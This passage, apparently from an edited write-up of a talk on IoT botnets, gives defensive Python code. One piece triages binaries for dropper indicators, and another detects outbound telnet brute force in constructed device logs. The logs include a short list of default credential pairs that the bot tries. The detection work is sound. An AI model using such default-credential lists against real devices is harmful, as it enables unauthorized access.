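    hits = [k for k, v in found.items() if v]
    found["score"] = len(hits)
    found["verdict"] = "likely IoT bot dropper" if len(hits) >= 3 else "inconclusive"
    return found


if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_BINARY), ("benign", BENIGN_BINARY)):
        report = triage(blob)
        print(name, report["verdict"], report["score"],
              report["downloaders"], report["remote_hosts"], report["default_creds"])
```

The remote hosts the triage pulls out are the same kind of pivot the speaker describes: the IP address you then go and assess from other angles. Strings can be obfuscated (Mirai's own credential table is XOR-encoded at rest), so an "inconclusive" verdict here means nothing more than "nothing found in plaintext".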
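The brute-force behaviour shown in the speaker's debug-interface video (the AVC module's telnet_client registering sessions, iterating an embedded username/password list against one target after another, sleeping, then resuming) is the kind of thing you have to dig out of noisy logs by looking for artifacts. The following is an added Python example written for this edit, not code from the talk or from the device vendor: it parses constructed debug lines whose format is an assumption, reconstructs the credential list from the order of attempts, counts sleep-separated bursts and flags the outbound brute-force pattern. The 192.0.2.0/24 addresses are a documentation range.

```python
import re

# Constructed debug output modelled on what the talk describes: a telnet_client
# routine inside the device's AVC module registering sessions, iterating an
# embedded credential list, sleeping and resuming. Not real device logs; the
# "<uptime> avc: ..." line format is an assumption made for this example.
SAMPLE_LOG = """\
1534 avc: init video controller
1540 avc: telnet_client register session -> 192.0.2.10:23
1541 avc: telnet_client try root/root -> 192.0.2.10 FAIL
1542 avc: telnet_client try root/admin -> 192.0.2.10 FAIL
1543 avc: telnet_client try admin/admin -> 192.0.2.10 FAIL
1544 avc: telnet_client try support/support -> 192.0.2.10 FAIL
1545 avc: telnet_client register session -> 192.0.2.11:23
1546 avc: telnet_client try root/root -> 192.0.2.11 FAIL
1547 avc: telnet_client try root/admin -> 192.0.2.11 FAIL
1548 avc: telnet_client try admin/admin -> 192.0.2.11 OK
1549 avc: telnet_client sleep 120
1670 avc: telnet_client register session -> 192.0.2.12:23
1671 avc: telnet_client try root/root -> 192.0.2.12 FAIL
1672 avc: telnet_client try root/admin -> 192.0.2.12 FAIL
1673 avc: telnet_client try admin/admin -> 192.0.2.12 FAIL
1674 avc: telnet_client try support/support -> 192.0.2.12 FAIL
1675 avc: video frame 1024x768 encoded
"""

# Constructed control: a single operator login from the device, which must not alert.
BENIGN_LOG = """\
2001 avc: init video controller
2002 avc: telnet_client register session -> 192.0.2.50:23
2003 avc: telnet_client try operator/s3cret -> 192.0.2.50 OK
"""

ATTEMPT_RE = re.compile(
    r"^(?P<t>\d+) avc: telnet_client try (?P<user>[^/\s]+)/(?P<pw>\S+) "
    r"-> (?P<ip>[\d.]+) (?P<res>OK|FAIL)$"
)


def parse_attempts(log):
    """Pull (uptime_seconds, user, password, target_ip, success) out of the noise."""
    attempts = []
    for line in log.splitlines():
        m = ATTEMPT_RE.match(line)
        if m:
            attempts.append((int(m["t"]), m["user"], m["pw"], m["ip"], m["res"] == "OK"))
    return attempts


def analyze(log, min_targets=2, min_creds=3, burst_gap=30):
    """Flag outbound telnet brute force: one device, many targets, a fixed credential list."""
    attempts = parse_attempts(log)
    targets = sorted({ip for _, _, _, ip, _ in attempts})
    # First-seen order reconstructs the embedded list the bot iterates over.
    credential_list = []
    for _, user, pw, _, _ in attempts:
        if (user, pw) not in credential_list:
            credential_list.append((user, pw))
    # Successful logins are the next victims to go and look at.
    compromised = sorted({ip for _, _, _, ip, ok in attempts if ok})
    # A burst ends when the bot sleeps longer than burst_gap between attempts.
    bursts, last_t = 0, None
    for t, *_ in attempts:
        if last_t is None or t - last_t > burst_gap:
            bursts += 1
        last_t = t
    flagged = len(targets) >= min_targets and len(credential_list) >= min_creds
    return {
        "attempts": len(attempts),
        "targets": targets,
        "credential_list": credential_list,
        "compromised": compromised,
        "bursts": bursts,
        "verdict": "outbound telnet brute force" if flagged else "no brute force pattern",
    }


if __name__ == "__main__":
    for name, log in (("sample", SAMPLE_LOG), ("benign", BENIGN_LOG)):
        r = analyze(log)
        print(name, r["verdict"], r["attempts"], "attempts over", len(r["targets"]),
              "targets; credential list:", r["credential_list"],
              "compromised:", r["compromised"])
```

The thresholds (two or more distinct targets, three or more distinct credential pairs) separate the bot's behaviour from one legitimate operator login; the recovered credential list is what you then cross-reference against default-credential lists, as the speaker does when tracing a password back to a Unix default.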